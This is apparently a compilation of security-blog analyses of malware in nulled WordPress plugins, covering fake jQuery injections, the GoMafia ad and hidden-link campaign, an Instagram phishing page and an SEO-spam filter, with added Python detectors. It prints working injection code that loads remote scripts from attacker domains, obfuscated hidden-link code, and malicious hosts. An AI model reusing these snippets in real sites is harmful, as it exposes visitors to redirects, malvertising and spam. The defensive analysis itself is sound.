Stop Using SEO Spam Links in Nulled Plugins Worthless

It’s not unusual to see website owners running things on a budget. Choosing a safe and reliable hosting company, buying a nice domain name, boosting posts on social media, and ranking on search engines — all this costs a lot of money. At the end of the day, some site owners may even choose to cut expenses by installing pirated (or nulled) software on their websites.

Fake jQuery Scripts in Nulled WordPress Plugins

We recently investigated some random redirects on a WordPress website that would only happen to certain visitors. Traffic analysis showed us that it was not a server-side redirect, rather it happened due to some script loaded by the web pages.

A quick look through the HTML code revealed this script:

Fake jQuery script injection
It was very suspicious for a few reasons:

www . wpquery . org/jquery.js — it’s definitely not a real jQuery domain, and WordPress comes with a prepackaged version of jquery.js, so there’s no need to link to it on some third-party site.

The script inclusion is random. It only happens if the current time value (in milliseconds) is even:
if (now%2 == 0)
It includes either jquery.min.js or jquery.js based on whether the current request has a referrer or not. That just doesn’t make sense.
Wp_func_jquery Function
This script was placed in the section between other scripts, so it was most likely injected by a wp_head hook in a theme or plugin. A quick search revealed the Ultimate_VC_Addons plugin that contained this code:

if(!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'https://';
        $library = '/jquery-1.6.3.min.js';
        echo(wp_remote_retrieve_body(wp_remote_get($host.'jquery'.'libs.org'.$library)));
    }
    if(rand(1,2) == 1) {
        add_action('wp_footer', 'wp_func_jquery');
    }
    else {
        add_action('wp_head', 'wp_func_jquery');
    }
}
As you can see, this wp_func_jquery function splits the URL into benign-looking fragments such as “jquery-1.6.3.min.js“, “jquery“ and “libs.org” to make it less obvious that it injects the content fetched from hxxp:// jquerylibs . org/jquery-1.6.3.min.js into web pages. Moreover, you can see that this function is hooked at random into either the header or the footer of WordPress pages.

When I checked that hxxp:// jquerylibs . org/jquery-1.6.3.min.js URL, I found the www . wpquery . org script that you see at the top of this post. Bingo!

Fake jQuery Domains
Further analysis showed that wpquery .org and jquerylibs.org are not the only fake jQuery domains used in this attack. We identified the following 8 malicious domains on 2 servers.

On 176 .9 .91 .14 (Germany Nuremberg Hetzner Online Ag)

jquerylibs . org — Created on June 2, 2014
uijquery . org — Created on July 10, 2014
ujquery . org — Created on November 5, 2014
cjquery . org — Created on January 16, 2015
ejquery . org — Created on February 28, 2015
On 62 .210 .149 .60 (France Paris Online S.a.s.)

wpstat . org — Created on April 5, 2015
wplibs . org — Created on April 5, 2015
wpquery . org — Created on April 5, 2015
Malware Evolution
In this section we will show you how the attack evolved over time.

Initially the attackers used the same domains both in the PHP code and in the injected JS code. The earlier versions of the malicious script looked like this:

They continued to introduce new fake jQuery domains every few months when they began experiencing problems (e.g. blacklists) with their current domains.

Then, in April, they changed their tactics and decided to reuse the old domains in the PHP code (which is not publicly visible), but created a few new fake domains on another server for the publicly visible JS injection.

You can also see how it evolved by the way they obfuscated those domains in the PHP code:

//direct call with string concatenation ...
echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));

//checking headers first...
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
$headers = get_headers($jquery, 0);
if ($headers[0] == 'HTTP/1.1 200 OK'){
    echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}

//it's not always jquery-1.6.3.min.js; on cjquery . org it is jquery-ui.js
$jquery = $host.'c'.'jquery.org/jquery-ui.js';

//using the library var in concatenation...
$host = 'https://';
$library = '/jquery-1.6.3.min.js';
echo(wp_remote_retrieve_body(wp_remote_get($host.'jquery'.'libs.org'.$library)));
With time, they also added some randomness to both the PHP code and the JS to make it harder to detect the script. Initially, they only injected the script in the footer sections, but in more recent versions, it can be either in the header or in the footer:

if(rand(1,2) == 1) {
    add_action('wp_footer', 'wp_func_jquery');
}
else {
    add_action('wp_head', 'wp_func_jquery');
}
And the remote script is now injected with the 50% probability.

var now = new Date().getTime(); if (now%2 == 0) {
… remote script injection here …
}
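A defender reviewing plugin source for this family of injections does not need to execute the code: the concatenated fragments can be reassembled statically. The following Python script is an added example (not code from the original post). It resolves simple `$var = '...'` assignments, joins adjacent `'a'.'b'` literals, and flags the `echo(wp_remote_retrieve_body(wp_remote_get(...)))` chain and an `add_action` hook chosen by `rand()`. The first embedded sample is the wp_func_jquery snippet quoted above; the second is a constructed, ordinary enqueue of the bundled jQuery. Function and variable names are the example's own.

```python
import re

# Indicators described in the post: a remote fetch whose body is echoed into the
# page, and a hook (wp_head / wp_footer) picked by rand() to vary placement.
REMOTE_ECHO_RE = re.compile(
    r"echo\s*\(\s*wp_remote_retrieve_body\s*\(\s*wp_remote_get\s*\(([^;]*?)\)\s*\)\s*\)\s*;"
)
RANDOM_HOOK_RE = re.compile(
    r"rand\s*\([^)]*\)[^{]*\{[^}]*add_action\s*\(\s*'(wp_head|wp_footer)'"
)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)\s*([^;]+);")
LIT_CONCAT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")


def collapse(expr):
    """Repeatedly join adjacent single-quoted literals: 'a'.'b' -> 'ab'."""
    prev = None
    while prev != expr:
        prev = expr
        expr = LIT_CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", expr)
    return expr.strip()


def resolve(expr, env):
    """Substitute already-resolved scalar variables, then collapse the concatenation."""
    expr = re.sub(r"\$(\w+)", lambda m: env.get(m.group(1), m.group(0)), expr)
    return collapse(expr)


def literal_value(expr):
    """Return the string content if expr is now one quoted literal, else None."""
    m = re.fullmatch(r"'([^']*)'", expr.strip())
    return m.group(1) if m else None


def scan_php(src):
    """Return a list of (indicator, detail) tuples for one PHP source text."""
    env = {}
    for name, rhs in ASSIGN_RE.findall(src):
        env[name] = resolve(rhs, env)
    findings = []
    for m in REMOTE_ECHO_RE.finditer(src):
        url = literal_value(resolve(m.group(1), env))
        findings.append(("remote-fetch-echo", url or m.group(1).strip()))
    if RANDOM_HOOK_RE.search(src):
        findings.append(("random-hook", "add_action target chosen by rand()"))
    return findings


# Sample 1: the injected wp_func_jquery code quoted in the post.
SAMPLE_INJECTED = """
if(!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'https://';
        $library = '/jquery-1.6.3.min.js';
        echo(wp_remote_retrieve_body(wp_remote_get($host.'jquery'.'libs.org'.$library)));
    }
    if(rand(1,2) == 1) {
        add_action('wp_footer', 'wp_func_jquery');
    } else {
        add_action('wp_head', 'wp_func_jquery');
    }
}
"""

# Sample 2: a constructed, ordinary enqueue of WordPress' bundled jQuery.
SAMPLE_BENIGN = """
function my_theme_scripts() {
    wp_enqueue_script('jquery');
}
add_action('wp_enqueue_scripts', 'my_theme_scripts');
"""

if __name__ == "__main__":
    for label, src in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```

The variable resolution is deliberately shallow (single-quoted literals and one level of `$var` substitution), which is exactly the amount of obfuscation shown in the evolution above; the `get_headers` variant is handled the same way because `$jquery` is assigned from literals before it is fetched.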
Redirections
If you try to open the malicious scripts in your browser, many of you will not see anything, but that doesn’t mean they are benign. The headers of the .js responses show that they are served by the PHP engine rather than as static content, so their content may change at any moment for the users the attackers are really interested in. At this time, we know that the scripts may redirect some visitors to hxxp: / / lock . page-request . com/mobile/m.html, which redirects desktop users further to hxxp://online-news . us/work-from-home-report/ and mobile users to URLs like these:

hxxp:/ /link .clickdirected .com/tracking202/redirect/dl.php?t202id=553&t202kw=
hxxp:/ /bangkokboy .791 .a .clickbetter .com
Infection Vector
In all cases we see the malicious code is injected into legitimate premium plugins and themes that are then distributed on untrustworthy sites. If you Google the phrase [wp_func_jquery], you’ll find a few forum threads where people find this malicious code inside the so-called “nulled” packages of various plugins. This infection vector is quite popular in the WordPress world and we have blogged about the threats of using pirated software on your websites before.

Most specialized websites that offer “nulled” software exist because they inject backdoors, malware and black-hat SEO spam into the pirated software they offer. This is not a WordPress specific problem. The same applies to “nulled” extensions, templates, etc. for Joomla!, Drupal and other CMS. We recommend reading a great write-up (by Fox-IT) of the CryptoPHP malware whose main distribution channel is “nulled” plugins and extensions.

This is just another warning to website owners to stay away from third-party software that comes from shady sources.

Nulled WordPress Themes: Malvertising and Black Hat SEO

If you have been following our blog for some time, you know that we regularly warn about risks associated with the use of third-party software on your site. A seemingly benign plugin may sneakily inject ads into your site which cause malvertising problems for the site visitors (e.g. SweetCaptcha). Other plugins may be hijacked by hackers or black hat freelancers too (remember the epic story of Wooranker?). Another common issue is the use of so-called “nulled” premium themes and plugins that usually come with backdoors, hidden links, unwanted ads and even pure malware (e.g. CryptoPHP or fake jQuery scripts).

This time I’ll tell you one more story that combines all the above mentioned problems: nulled plugins, black hat SEO, malvertising, and a software development company that turned to the dark side.

Suspicious gma_footer Code
Recently the lead of our remediation team, Bruno Zanelato, cleaned a site and found this piece of code in one premium WordPress plugin:

Suspicious gma_footer code
The encoded part decodes to hxxp://cdn .gomafia[.]com. As you might expect, he investigated what’s going on there.

That gma_footer function was hooked to the wp_footer action. As a result, the code fetched from cdn.gomafia[.]com was injected into the footer of every site page. So what exactly is being injected?

Injected cdn.gomafia code
The injected code varies in its keywords and in the set of ad scripts it uses, but you can always see these three main parts:

Ad scripts from eclkmpsa[.]com/adServe/banners?tid=131711_225710_0&tagid=2, www .tradeadexchange[.]com/a/display.php?r=1219598 and cdn.popcash[.]net/pop.js
Invisible spammy links that at the moment point to gomafia[.]com and some other Indian sites (including one porn site)
Google Analytics code with the UA-5133396-16 id

Malvertising
Running someone else’s ads on your site is probably not what you expect when you install a plugin. The thing is, you might not even see them when you browse your own site. These particular scripts are configured to show popups only when visitors spend some time on a site and perform some action there. For example, scroll the page or click something.

The ads they show in popups are of quite questionable quality – gambling, scams, and even malicious downloads like this:

Fake HD Video Player
The downloaded HDVideoPlayer_2403439173.exe was detected as malicious by 13 antivirus products.

Hidden Links
Following the ad scripts, you can see a block of spammy links that point to gomafia[.]com and three more sites. The links are not visible on infected web pages because of the tag that wraps them:

The GMA style is not defined in the injected HTML part, so how does it work? Let’s get back to the PHP code we found in the plugin. In addition to the gma_footer, it also defines this gma_styles function (used in the wp_enqueue_scripts hook):

function gma_styles () {
    wp_enqueue_style( 'gomafia', plugin_dir_url(__FILE__) .'gma.css');
}

We can see how this code makes WordPress include the gma.css stylesheet file from the plugin’s directory on every page. And here’s the content of that file:

.GMA { display: none; }

Now it’s clear what makes the links invisible.

Google Analytics
In addition to ads and spammy links, the malware injects a Google Analytics code with the UA-5133396-16 tracking ID into every infected web page (it is possible to use multiple tracking codes on the same web page). It allows the spammers to track their campaign and see the overall page views with their injected ads across all the infected sites.

The Google Analytics tracking code may also help the attackers verify themselves as the owners of the infected sites in Google Search Console. We have no information whether the attackers actually tried to do this, but we can’t discard the possibility, since some other black hat SEO attacks did verify themselves as owners of the infected sites in the Search Console.

What Is GoMafia Anyway?
When we found the malicious code in the plugin, the first question was whether it was a part of the real plugin or injected by hackers. Since it was a premium plugin, it was hard to obtain its original source code. Moreover, premium plugins rarely (if ever) resort to such tricks — their developers monetize their work directly by selling their plugins.

The answer to the question about the origin of the malicious code became obvious when we opened the GoMafia[.]com site. This site is a collection of “nulled” premium themes and plugins, mainly from CodeCanyon.

To verify our hypothesis, we downloaded a few themes and plugins from that site. All of them contained the gma_footer code that injected the content of the hxxp://cdn.gomafia[.]com page into web pages of sites that install them.

It’s worth adding that the GoMafia[.]com site also uses the same ad scripts that create annoying (and usually malicious) popups and popunders. Moreover, their download links use adf[.]ly interstitial pages that show ads before redirecting to the actual download page. This service shares ad revenue with users who send traffic to their interstitial pages. Not only are such pages annoying, but a significant share of their ads consist of pure scams and malware downloads. For example, the first time I clicked on the adf[.]ly link my browser began downloading the fasttorrent.exe file (Detection ratio: 20 / 56 on Virustotal).

Digging Deeper
If we dig a bit deeper, we can reveal some other interesting details about the people behind this GoMafia black hat campaign.

WHOIS records show that the gomafia[.]com domain was registered just a couple of months ago on March 8, 2016 by Viji Sathish from Tamil Nadu state in India. If we check WHOIS data for the other three domains that we see in the block of spammy links, we’ll notice that they all have absolutely the same registration address, but registered by “Sathishkumar M“.

The oldest one (metaskapes[.]com) was registered back in 2009 and the newest one (coupontwit[.]com) was registered just two months ago. So despite the fact that the four sites in the spammy link block look different at first glance (nulled software, interior design, coupons and porn) they all belong to the same people and GoMafia injects that block of links to third-party websites to promote their own resources, not third-party sites.

Let’s see what else is common between these four sites.

They all use the same ID for Google Analytics: UA-5133396-x (where x changes from site to site), which also proves that they are all controlled by the same people.

One more piece of the puzzle can be found if you check the email addresses specified in the WHOIS data. All the emails are different (sathish.5566(at)gmail .com, sathish(at)kenzest .com, viji(at)kenzest .com), but they show us that:

Sathishkumar M and Viji Sathish are probably the same person.
He has something to do with kenzest[.]com site, since he has two different accounts on that private domain.
Moreover, kenzest[.]com and coupontwit[.]com (one of the spammy links) are hosted on the same server 192 .185 .21 .192. The rest of the sites (including gomafia[.]com) are behind the CloudFlare firewall so it’s hard to tell their real IPs. But if we change the IP address of gomafia[.]com to 192 .185 .21 .192 in our /etc/hosts file, we’ll see that the GoMafia site is also hosted on the same server as kenzest[.]com.

Kenzest.com
Kenzest[.]com is a site of an Indian company that describes itself as a “group of Computer Engineers who have learned to provide solutions that work, to our customers“.

On the contact page we find the same address and phone number as in the gomafia[.]com WHOIS record. Moreover, it says that the phone number belongs to Sathish! With a bit of Googling we can even find Sathish Kumar M of Kenzest himself. Here’s his article and photo from back in 2010. Apparently, back then Sathish was still trying to find a good application for his software development skills.

Most likely their white hat business wasn’t that successful, and they eventually began to explore the dark side of Internet marketing: porn, intrusive ads, black hat SEO, software piracy and abuse of third-party sites.


In addition to software development, Kenzest Technologies also provides SEO services. This is a quote from their site:

Our keyword research team at Kenzest specializes in SEO. Our SEO services make the site highly superior to all other 24,930,000,000 .coms found on the internet.

I gather GoMafia[.]com is just a part of their SEO strategy:

Have as many sites as possible install their nulled plugins.
As a proof-of-concept, inject links to their own sites and track their progress in search results.
Once they reach a certain level on infected sites and find paying clients interested in their SEO services, they can replace their own links with their clients’ links. It’s easy – all they need to do is change the contents of their own cdn.gomafia[.]com page.
Meanwhile, they are trying to monetize their GoMafia project with ads (intrusive and usually malicious): on their sites, in download links, and on the sites they infect.

Given the decisions they have made so far, they can easily replace the hidden links and ads on cdn.gomafia[.]com with more dangerous types of malware if they figure out how to monetize it. Or, they will put backdoors and malware directly in the nulled plugins like many other similar sites do.

“Free” vs Free
This story once again demonstrates to us why it’s always a bad idea to install “free” premium software on your website and what makes people offer such “nulled” themes and plugins for “free”. It’s just a criminal business model where instead of paying directly to the software developers, you are paying to criminals by giving them a chance to abuse your site and your site visitors.

Actually, every third-party component that you install on your site can potentially cause security issues such as backdoors, malware, spam, or just vulnerabilities that can be exploited by hackers. Whenever you install something, you should ask yourself these questions:

Does my site really need this software?

Can I trust the developer?
Can I trust the source where I obtained this software from?
Will I be able to get timely security updates if vulnerabilities are found?
To minimize risks, use popular free software from official repositories like the Plugin Directory or Theme Directory. Every day, many people download and test software there, so any security problems are revealed quite fast. Another option is to purchase premium software directly from its developers or official distributors. This way you support the developers and ensure that you get the original software that wasn’t tampered with.

Fake Instagram Verification

Across various social media platforms there are verification checkmark symbols that appear near the name of the account’s page we view. For example, this verified account indicator seen from our Twitter page:

These verification checkmarks exist as a credibility indicator to help show authenticity and integrity to social media page visitors.

In order to obtain these checkmark symbols, page owners must meet a list of various requirements and undergo a verification process with their social media provider.

The Quest for Instagram Verification Checkmarks
These strong requirements also lead to a sort of exclusivity around the verification checkmark.

Reportedly only 1% of Instagram users have undergone the verification process. Instagram’s explosion in popularity, along with the exclusivity of the verification checkmark, has led to verification being highly desirable for many users, though this sentiment exists on other social media platforms like Twitter.

I want to be verified on Instagram. I crave that blue check next to my name. Why? Basically because none of my friends are verified, so the verification will prove I’m better than them; which I always suspected.

– A joke by the writer, which showcases the desire many users have for being verified

While the majority of users may want the verification symbol for bragging rights, having the symbol can also help monetize a social media page. This is driving some users to pursue any way possible to obtain the coveted verification checkmark for their profiles.

A Phishing Campaign for Instagram Users
When combined, all of these factors can lead someone to ignore the warning signs and fall victim to phishing attempts. We recently came across this page, which masquerades as a real Instagram Verification submission page:

Verified Instagram Phishing Page

After clicking Apply Now, it begins a series of phishing forms on the phishing domain instagramforbusiness[.]info. This form targets the victim’s Instagram login information and then asks them to confirm their email address…by asking for their email address and password credentials.

Instagram Email Confirmation Phishing

After submitting each form, the login information is sent via email to the hackers. This provides them with unauthorized access to the victim’s social media page. Instagram employs fingerprinting and a variety of other methods to determine suspicious account logins. If detected, they lock down the account with a “Suspicious Login Attempt” warning.

In order to avoid this account lockdown, attackers need one of two things: access to the phone number used to register the account (if applicable as Instagram doesn’t require a phone number for signup) or access to the email address associated with the profile.

This explains why hackers also target associated email login information on this phishing page. It allows them to reset and verify ownership of the phished Instagram account should the “Suspicious Login Attempt” warning be triggered.

Looking for Signs of a Phishing Campaign
Don’t let your situational awareness be lowered by the promise of an exclusive item or status. There were a number of clear signs that this page was malicious:

The domain name is clearly not instagram.com.
A lack of HTTPS results in insecure warnings in visitors’ browsers. Large websites like Instagram typically use HTTPS, especially when handling login information and other sensitive information.
Instagram will never ask for a linked email account’s password as confirmation. It will use the standard method of sending an email with a verification link for you to click.
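The three signs listed above can be checked mechanically, for instance in a link-scanning filter. The following Python function is an added example, not code from the original post: it flags a missing HTTPS scheme, a hostname that mentions a brand while its registrable domain is not the brand's own, and a form that requests the linked email account's password. The brand allow-list, the naive two-label "registered domain" rule and all function names are this example's assumptions; the phishing host comes from the post, the other sample URLs are constructed.

```python
from urllib.parse import urlsplit

# Brands a login form may impersonate, mapped to the registered domains that
# legitimately host them (constructed allow-list for this example).
LEGITIMATE_DOMAINS = {
    "instagram": {"instagram.com"},
    "twitter": {"twitter.com"},
}


def registered_domain(host):
    """Naive registrable domain: the last two labels (enough for .com/.info-style TLDs)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def phishing_indicators(url, asks_for_email_password=False):
    """Return the warning signs from the post that apply to a submission page."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    reasons = []
    if parts.scheme != "https":
        reasons.append("no HTTPS")
    reg = registered_domain(host)
    for brand, legit in LEGITIMATE_DOMAINS.items():
        # "instagram" appearing anywhere in the host while the registrable
        # domain is something else is the lookalike pattern seen above.
        if brand in host and reg not in legit:
            reasons.append(f"host mentions '{brand}' but the registered domain is {reg}")
    if asks_for_email_password:
        reasons.append("form asks for the linked email account's password")
    return reasons


if __name__ == "__main__":
    for url, asks in (("http://instagramforbusiness.info/apply", True),
                      ("https://www.instagram.com/accounts/login/", False)):
        print(url, "->", phishing_indicators(url, asks) or ["no indicators"])
```

The two-label rule is intentionally simple; for multi-part public suffixes (co.uk and the like) a real deployment would use the Public Suffix List instead.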
Conclusion
The lure of a social media verification checkmark symbol works great to entice unsuspecting victims. This is similar to the lure of “free” (i.e. nulled, cracked) products, like premium WordPress plugins or themes.

As a rule of thumb, you should always verify the links you are clicking on and ensure that you are only submitting personal information on legitimate websites. Malicious users are actively looking for a chance to deceive their victims with phishing campaigns. If you are looking for a website security solution, we will be happy to help you.

Unfortunately, as discussed in some of our earlier posts about free software and fake verification, these “free” components may still come with a hefty price tag. The same people who remove the plugin’s or theme’s license checks may have also added some other form of monetization — and most times, the end result is not desirable.

Injection in Smart Grid Gallery Plugin
This time, we identified malicious code injected within the Smart Grid Gallery plugin. The malicious code, which was found injected into the SmartGridGalleryClass.php file, didn’t even try to be discreet.

Seen below, the injection consisted of two long hex encoded strings and an ironic sorry_function.

if (!function_exists('sorry_function')) {
    function sorry_function($content) {
        if (is_user_logged_in()) { return $content; }
        else {
            if (is_page() || is_single()) {
                $vNd25 = "\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76";
                $zoyBE = "\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62\x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\156\x64\x20\x61\160\x70\163\x2e\74\x2f\x64\x69\x76\76";
                $fullcontent = $vNd25 . $content . $zoyBE;
            } else {
                $fullcontent = $content;
            }
            return $fullcontent;
        }
    }
    add_filter('the_content', 'sorry_function');
}
Hidden Divs Boost SEO Rankings
Once decoded, the real intention becomes apparent. It adds hidden divs which link to two other websites — probably related to the same person who nulled the plugin — in an attempt to increase their SEO rankings:

<?php
if (!function_exists('sorry_function'))
{
    function sorry_function($content)
    {
        if (is_user_logged_in())
        {
            return $content;
        }
        else
        {
            if (is_page() || is_single())
            {
                $vNd25 = '<div style="position:absolute;top:0;left:-9999px">Want create site? Find <a href="http://dlwordpress.com/">Free WordPress Themes</a> and plugins.</div>';
                $zoyBE = '<div style="position:absolute;top:0;left:-9999px">Did you find apk for android? You can find new <a href="https://dlandroid24.com/">Free Android Games</a> and apps.</div>';
                $fullcontent = $vNd25 . $content . $zoyBE;
            }
            else
            {
                $fullcontent = $content;
            }
            return $fullcontent;
        }
    }
    add_filter('the_content', 'sorry_function');
}
Evasive Maneuvers & Sources
This injection leverages a WordPress function called add_filter which “allows plugins to modify various types of internal data at runtime.”

In this case, the malicious code wraps the site’s valid content between two hidden divs. To avoid detection, the divs are added only under specific conditions: when no user is logged in and the request is for a page or a single post.
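Both hidden-link techniques on this page (the GoMafia block hidden by the `.GMA { display: none; }` rule in a separately enqueued stylesheet, and the Smart Grid Gallery divs pushed off-screen with an inline `left:-9999px`) can be found from the rendered HTML with the same check. The following Python parser is an added example, not code from the original post or from either plugin: it walks the HTML, tracks which open elements are hidden (by inline style or by a class whose CSS rule hides content), and reports every link inside such an element. The `extra_css` argument stands in for a stylesheet loaded separately, as gma.css was; the sample HTML, the stylesheet constant, the hostnames and the class and function names are all constructed for the example.

```python
import re
from html.parser import HTMLParser

# CSS declarations that keep an element out of sight while leaving the link in the DOM.
HIDE_PATTERNS = (
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"(?:left|top|text-indent)\s*:\s*-\d{3,}px", re.I),  # pushed far off-screen
)
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input"}


def style_hides(css_body):
    return any(p.search(css_body) for p in HIDE_PATTERNS)


def hidden_classes(css_text):
    """Class names whose rule body hides content, e.g. '.GMA { display: none; }'."""
    hidden = set()
    for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css_text):
        if style_hides(body):
            hidden.update(re.findall(r"\.([\w-]+)", selector))
    return hidden


class HiddenLinkFinder(HTMLParser):
    """Collect (href, reason) for every <a> placed inside a hidden element."""

    def __init__(self, extra_css=""):
        super().__init__()
        self.hidden_classes = hidden_classes(extra_css)
        self._in_style = False
        self._stack = []  # per open element: why it is hidden (inherited), or None
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self._in_style = True
        reason = None
        if style_hides(a.get("style", "")):
            reason = "inline style: " + a["style"]
        else:
            for cls in a.get("class", "").split():
                if cls in self.hidden_classes:
                    reason = "class ." + cls
                    break
        effective = reason or (self._stack[-1] if self._stack else None)
        if tag == "a" and a.get("href") and effective:
            self.findings.append((a["href"], effective))
        if tag not in VOID_TAGS:
            self._stack.append(effective)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self._stack.pop()

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False
        if tag not in VOID_TAGS and self._stack:
            self._stack.pop()

    def handle_data(self, data):
        if self._in_style:  # rules in an inline <style> block count too
            self.hidden_classes |= hidden_classes(data)


def find_hidden_links(html, extra_css=""):
    parser = HiddenLinkFinder(extra_css)
    parser.feed(html)
    return parser.findings


# Constructed stylesheet mirroring the gma.css content described above.
GMA_CSS = ".GMA { display: none; }"

# Constructed page: one visible link, one hidden by class, one hidden off-screen.
SAMPLE_HTML = """
<html><head><style>.visible{color:#333}</style></head><body>
<p>Normal content with a <a href="https://example.org/about">visible link</a>.</p>
<div class="GMA"><a href="http://spam-example.test/">hidden by class</a></div>
<div style="position:absolute;top:0;left:-9999px">
  Want create site? Find <a href="http://offscreen-example.test/">off-screen link</a>
</div>
</body></html>
"""

if __name__ == "__main__":
    for href, why in find_hidden_links(SAMPLE_HTML, GMA_CSS):
        print(href, "<-", why)
```

Without the external stylesheet the `.GMA` block would look like an ordinary div, which is why the check must be fed every stylesheet the page loads, not just the inline ones.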

Upon further investigation, we identified that the installed plugin was a nulled version and had been downloaded from the free themes website hxxps://www[.]downloadfreethemes[.]co/smart-grid-gallery-v1-4-0-responsive-wordpress-gallery-plugin/. We were able to download the same plugin with the same injection, however, there is no reference to this site in the code.

The websites referenced in the malicious injection, dlwordpress[.]com and dlandroid24[.]com, were clearly fake sites used to increase SEO rankings and make money on referral programs for other websites. Using PublicWWW while writing this article, we found dlwordpress injected on 7,040 sites and dlandroid24 on 6,262 sites. Using Majestic we found dlwordpress on 5,000 sites, which is the limit for our account there.

In conclusion, site owners should always avoid installing nulled themes/plugins from any source. A large majority of nulled software contains malicious backdoors or SEO spam injections, which can pose serious security risks to your website’s visitors and environment. You can also audit existing plugins to make sure any nulled software has not been installed on the WordPress environment.

Update: As of Jan 5, 2021, the website dlwordpress[.]com has switched owners and no longer seems to be involved in the Blackhat SEO campaign. It is important to note that Blackhat SEO campaigns can have long-lasting impacts for webmasters, since many sites still send unauthorized backlinks to the domain.